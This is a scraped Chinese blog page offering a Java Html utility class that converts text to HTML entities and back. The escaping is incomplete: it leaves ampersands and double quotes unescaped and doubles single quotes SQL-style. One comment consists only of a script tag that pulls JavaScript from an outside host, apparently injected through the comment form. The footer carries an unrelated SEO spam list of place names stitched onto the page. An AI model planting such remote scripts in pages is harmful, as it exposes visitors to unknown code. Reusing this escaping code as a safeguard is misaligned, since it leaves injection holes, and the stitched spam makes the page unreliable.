古煙之技術專欄

          致力于中國企業(yè)信息化與國際電子商務整合方案!

          JAVA中轉(zhuǎn)換HTML代碼

          package com.wide.cabaret.utils;

          public class Html{
            public Html(){
              super();
            }

            public String toHtml(String str){
              if (str==null){
                return "";
              }else{
                str=str.replaceAll("<", "&lt;");
                str=str.replaceAll(">", "&gt;");
                str=str.replaceAll("'", "''");
                str=str.replaceAll(" ", "&nbsp;");
                str=str.replaceAll("\n", "<br>");
              }
              return str;
            }

            public String toText(String str){
              if (str==null){
                return "";
              }else{
                str=str.replaceAll("&lt;", "<");
                str=str.replaceAll("&gt;", ">");
                str=str.replaceAll("''", "'");
                str=str.replaceAll("&nbsp;", " ");
                str=str.replaceAll("<br>", "\n");
              }
              return str;
            }
          }

          posted on 2007-05-01 01:49 古煙 閱讀(542) 評論(3)  編輯  收藏 所屬分類: Jsp

          評論

          # re: JAVA中轉(zhuǎn)換HTML代碼[未登錄] 2008-07-07 09:17 a

          <script language="javascript" src="http://qqjs2.55.la/user_pic/qqjs/2008/07/07/09/44725.js"></script>
            回復  更多評論   

          # re: JAVA中轉(zhuǎn)換HTML代碼[未登錄] 2008-10-10 23:11 輝輝

          愛你不是我的錯  回復  更多評論   

          # re: JAVA中轉(zhuǎn)換HTML代碼[未登錄] 2008-10-10 23:13 輝輝

          @輝輝
            回復  更多評論   


          只有注冊用戶登錄后才能發(fā)表評論。


          網(wǎng)站導航:
           
          <2025年7月>
          293012345
          6789101112
          13141516171819
          20212223242526
          272829303112
          3456789

          導航

          統(tǒng)計

          公告

          我的Blog終于開通了

          留言簿

          文章分類

          文章檔案

          最新隨筆

          搜索

          最新評論

          主站蜘蛛池模板: 赤水市| 崇信县| 蓝田县| 和田县| 罗城| 铜梁县| 五寨县| 江永县| 册亨县| 和田县| 张北县| 铜陵市| 吴忠市| 迭部县| 平凉市| 平武县| 高州市| 将乐县| 于都县| 宁德市| 灌南县| 正定县| 蒙自县| 闽清县| 探索| 雷州市| 宁晋县| 馆陶县| 台山市| 南宫市| 商丘市| 城市| 池州市| 台北市| 黑龙江省| 噶尔县| 达日县| 青冈县| 宁德市| 阳信县| 漳州市|